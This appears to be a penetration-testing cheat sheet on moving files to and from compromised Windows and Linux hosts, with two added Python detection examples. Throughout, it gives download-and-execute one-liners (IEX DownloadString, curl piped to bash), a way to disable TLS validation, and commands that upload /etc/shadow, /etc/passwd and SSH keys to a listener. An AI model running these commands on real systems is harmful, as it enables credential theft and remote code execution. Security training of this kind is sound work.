File Transfers
Windows Methods Downloading
PowerShell Base64
Linux
Check MD5 Hash:
md5sum id_rsa
Encode the file in base64:
cat id_rsa | base64 -w 0;echo
output:
LS0tl1.........Z1
PowerShell
Decode:
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("<BASE64_STRING>"))
Check MD5 hash:
Get-FileHash C:\Users\Public\id_rsa -Algorithm MD5
PowerShell Web Downloads
HTTP and HTTPS outbound traffic is usually allowed through a firewall.
In PowerShell, we can use the System.Net.WebClient class to download a file.
Method
Description
Returns the data from a resource without blocking the calling thread.
Downloads data from a resource and returns a Byte array.
Downloads data from a resource and returns a Byte array without blocking the calling thread.
Downloads data from a resource to a local file.
Downloads data from a resource to a local file without blocking the calling thread.
Downloads a String from a resource and returns a String.
Downloads a String from a resource without blocking the calling thread.
File Download
(New-Object Net.WebClient).DownloadFile('<File-URL>','<Output-File-Name>')
(New-Object Net.WebClient).DownloadFileAsync('<File-URL>','<Output-File-Name>')
Download String (Fileless)
IEX (New-Object Net.WebClient).DownloadString('<STRING>')
Web Request
Invoke-WebRequest <FILE.ps1> -OutFile PowerView.ps1
Other Types
Common Errors
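If Internet Explorer has not been configured, Invoke-WebRequest returns an error; we can bypass this with the -UseBasicParsing parameter.
If we get an error saying the SSL/TLS certificate is not trusted, we can bypass it with the following, which turns off certificate validation for the rest of the PowerShell session: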
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
SMB Download
First, create an SMB server using Impacket
sudo impacket-smbserver share -smb2support /tmp/share
Later versions of Windows block unauthenticated guest access
To authenticate add the params:
-user <USER>
-password <PASS>
To download a file
copy \\<IP>\share\file.exe
Mount the SMB share
net use n: \\<IP>\share /user:<USER> <PASS>
FTP Download
We start by configuring an FTP server
sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21
Transfer files using PowerShell
(New-Object Net.WebClient).DownloadFile('ftp://<IP>/file.txt', 'C:\Users\Public\<FILE>')
If we don't have an interactive shell, we can create an FTP command file
echo open <IP> > ftpcommand.txt
echo USER anonymous >> ftpcommand.txt
echo binary >> ftpcommand.txt
echo GET file.txt >> ftpcommand.txt
echo bye >> ftpcommand.txt
ftp -v -n -s:ftpcommand.txt
open 192.168.49.128
Log in with USER and PASS first.
USER anonymous
GET file.txt
bye
Uploads
Encoding File using PowerShell
[Convert]::ToBase64String((Get-Content -path "C:\<FILE>" -Encoding byte))
Decode using Linux
echo <STRING> | base64 -d > host
PowerShell Web Uploads
PowerShell doesn't have a built-in function for uploads.
We can use Invoke-WebRequest instead.
First, we need to set up the web server
pip3 install uploadserver
python3 -m uploadserver
PowerShell to upload a file to the Python Upload Server
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts
[+] File Uploaded: C:\Windows\System32\drivers\etc\hosts
[+] FileHash: 5E7241D66FD77E9E8EA866B6278B2373
PowerShell Base64 Upload
PowerShell script to upload a file to the Python server
$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64
Linux Methods
Encode a file with base64
cat id_rsa | base64 -w 0;echo
Then decode
echo -n '<STRING>' | base64 -d > id_rsa
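A detection-side view of the Base64 transfers shown above (the PowerShell decode and the Linux encode/decode): the sketch below pulls long Base64 runs out of a command line and labels what they decode to. It is an added example, not part of the original page; the 40-character threshold, the labels and the sample command lines are this example's own assumptions.

```python
import base64
import re

# Runs of 40+ Base64 characters with optional padding; the threshold is this example's choice.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Leading bytes of the decoded data mapped to labels (labels are this example's own).
MAGIC = [
    (b"-----BEGIN", "pem_key_or_certificate"),
    (b"MZ", "windows_executable"),
    (b"\x7fELF", "elf_executable"),
    (b"#!", "script_with_shebang"),
]


def classify(head):
    """Label decoded bytes by their leading magic value."""
    for magic, label in MAGIC:
        if head.startswith(magic):
            return label
    return "unknown"


def find_encoded_payloads(cmdline):
    """Return (label, encoded_length) for every long Base64 run in a command line."""
    findings = []
    for match in B64_RUN.finditer(cmdline):
        blob = match.group(0)
        # 16 Base64 characters always decode cleanly to 12 bytes, enough for the magic check.
        head = base64.b64decode(blob.rstrip("=")[:16])
        findings.append((classify(head), len(blob)))
    return findings


# Constructed samples: a fake PEM-framed file and a fake PE header, encoded the way the page does.
FAKE_KEY = base64.b64encode(b"-----BEGIN OPENSSH PRIVATE KEY-----\nconstructed-not-a-key\n").decode()
FAKE_PE = base64.b64encode(b"MZ\x90\x00" + bytes(60)).decode()
SAMPLE_CMDLINES = [
    f'[IO.File]::WriteAllBytes("C:\\Users\\Public\\id_rsa", [Convert]::FromBase64String("{FAKE_KEY}"))',
    f"echo -n '{FAKE_PE}' | base64 -d > file.exe",
    "md5sum id_rsa",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(find_encoded_payloads(line), "|", line[:60])
```

The "LS0t" prefix in the page's sample output is the Base64 form of "---", which is why the PEM check fires on an encoded key.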
Downloading Files
Wget
wget http://<URL>/file.ext -O /tmp/file.ext
Curl
curl -o /tmp/file.sh http://<URL>/path/file.sh
Bash
If other tools are not available we can use Bash
Connect to a target Web server
exec 3<>/dev/tcp/<IP>/<PORT>
HTTP GET
echo -e "GET /script.sh HTTP/1.1\n\n">&3
Print Response
cat <&3
Fileless Downloads
The downloaded script is piped straight to the interpreter and executed immediately (Bash in the first case, Python in the second)
curl http://<IP>/script.sh | bash
wget -qO- http://<URL>/path/file.py | python3
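The download-and-execute commands in the PowerShell and Linux sections above leave recognizable process command lines. The following is an added example, not part of the original page, of matching them in process-creation logs; the rule names, hosts and log records are constructed for illustration.

```python
import re

# Rule names are this example's own; patterns mirror commands shown on this page.
RULES = [
    ("ps_webclient_download",
     re.compile(r"Net\.WebClient\b.*\.Download(String|File|Data)(Async)?\b", re.I)),
    ("ps_download_and_execute",
     re.compile(r"\b(IEX|Invoke-Expression)\b.*\.DownloadString\b", re.I)),
    ("ps_cert_validation_disabled",
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("pipe_to_interpreter",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(bash|sh|python[\d.]*)\b", re.I)),
    ("bash_dev_tcp", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
]

# Constructed process-creation records (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("ws01", "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')\""),
    ("ws01", "powershell Get-ChildItem C:\\Users\\Public"),
    ("web02", "curl http://198.51.100.7/script.sh | bash"),
    ("web02", "curl -o /tmp/report.pdf https://intranet.example/report.pdf"),
    ("web03", "wget -qO- http://198.51.100.7/file.py | python3"),
    ("web03", "bash -c 'exec 3<>/dev/tcp/198.51.100.7/80'"),
]


def match_rules(cmdline):
    """Return the names of all rules whose pattern occurs in the command line."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def triage(events):
    """Keep only events that hit at least one rule, with the rule names attached."""
    findings = []
    for host, cmdline in events:
        hits = match_rules(cmdline)
        if hits:
            findings.append({"host": host, "cmdline": cmdline, "rules": hits})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["host"], ",".join(finding["rules"]), "|", finding["cmdline"])
```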
SSH
scp <user>@<IP>:/root/filex.txt .
Web Uploads
Upload server for HTTPS
sudo python3 -m pip install --user uploadserver
Create a self-signed certificate
openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
Start Server
sudo python3 -m uploadserver 443 --server-certificate /root/server.pem
Upload Multiple Files
curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
SSH Upload
scp /etc/passwd <USER>@<IP>:/home/passwd
Transfer with Code
One Liners
With Python, we can use the -c option to run commands
Python2 Download
python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
Python3 Download
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
Uploading:
python3 -m uploadserver
python3 -c 'import requests;requests.post("http://<IP>:8000/upload",files={"files":open("/etc/passwd","rb")})'
PHP
With PHP we can use the -r option to run commands
Downloading with file_get_contents
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
Download with fopen
php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
Download a file and pipe to Bash
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash
Ruby Download
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
Perl Download
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
JavaScript
// wget.js
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
Run in Windows and Download
cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
VBScript
' wget.vbs
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end with
Download a file in Windows
cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1
Miscellaneous Methods
Netcat
Listening and Downloading
nc -l -p 4444 > file.exe
Sending a file
nc -q 0 10.10.120.10 4444 < file.exe
Sending file as Input to Netcat
sudo nc -l -p 443 -q 0 < file.exe
Receive File
nc <IP> 443 > file.txt
Ncat
Listening and Downloading
ncat -l -p 4444 --recv-only > file.exe
Sending a File
ncat --send-only 192.168.49.128 4444 < file.exe
Sending a file as Input to Ncat
sudo ncat -l -p 443 --send-only < file.exe
Receive File
cat < /dev/tcp/<IP>/443 > file.exe
RDP
Mounting a Linux Folder using xfreerdp
xfreerdp /v:10.10.10.132 /d:DC /u:user /p:'password' /drive:linux,/home/user/
File Encryption
Windows
One of the easiest methods is using this PowerShell script
PS > Import-Module .\Invoke-AESEncryption.ps1
PS > Invoke-AESEncryption -Mode Encrypt -Key "password" -Path .\sensitive-info.txt
Linux
Using OpenSSL with aes256 encryption
Encryption:
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc
enter aes-256-cbc encryption password:
Verifying - enter aes-256-cbc encryption password:
Decryption:
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd
enter aes-256-cbc decryption password:
Useful Tools
Uploading files and grabbing them without any setup